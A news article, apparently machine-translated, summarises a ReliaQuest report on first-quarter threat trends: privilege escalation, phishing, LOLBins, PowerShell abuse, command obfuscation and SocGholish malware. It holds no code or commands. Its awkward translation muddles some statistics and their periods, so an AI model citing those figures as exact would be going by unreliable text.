According to a study by ReliaQuest, a digital security response and defense platform, privilege escalation rose from 7.1% to 46.6% of security incidents in the first quarter. Among other hacking methods, “Lolbins” that hijack the use of legitimate Windows files are still widespread. Phishing is still the most widespread threat.
The trends of the main threats already present in 2023 continued at the beginning of this year. Incident resolution time is longer in the security sector.OT (Operational technology), that is, industry and IT (public and private organizations). The use of artificial intelligence continues to advance, enabling the reduction of mean incident resolution time (MTTR) to 7 minutes or less.
In the first quarter, the biggest increase in threats is escalation privileges access to accounts and services with a very significant increase
from 7.1% to 46.6%.
THE phishing, drive-by compromise (compromising a website with malicious code) and privilege exploitation remain the main attack techniques. Phishing is among 27.2% of critical security incidents recorded by ReliaQuest.
LolBins (Living Off The Land Binaries) are legitimate Microsoft files like Rundll32, Msiexec or other trusted software publishers. Hackers use them to compromise a Windows machine. In 2023, they were the source of a large part of critical incidents, i.e. 22.3% of them.
Powershell, Microsoft’s task automation solution, is the command execution tool preferred by hackers. It was the cause of 19.4% of incidents in 1this one quarter, while in the fourth quarter of 2023 it was in third place.
Command obfuscation and abuse of Windows RunDLL32 at the forefront of defensive avoidance methods
l’blurring orders consists of rendering the orders unreadable in order to fool detection systems and make it difficult for defenders to analyze them. This threat remained at the top of stealth attack techniques in 22.06% of incidents. LNK files, which are Windows file extensions, are used for file shortcuts and also allow, after compromise, to evade defenses.
Misuse of the Windows runDLL32 utility is also counted among the most harmful hidden threats. In terms of malware, SocGholish, which was relatively uncommon in the fourth quarter of 2023, rose to the top spot in the first quarter of this year. SocGholish is distributed through compromise
drive-by, or “exploit” that installs malicious software without the user realizing that their machine is compromised.
Hence its great danger. In this case, ReliaQuest shows what it pretends to be a web browser update, but is actually a malicious JavaScript file. This malware dethroned AsyncRAT, the remote access Trojan, which was the top malware in the last quarter of 2023.
Finally, phishing still maintains its place as the threat leader in all categories, links to this type of threat were used in 2023.
in 71.1% of incidents to facilitate initial access to networks or systems.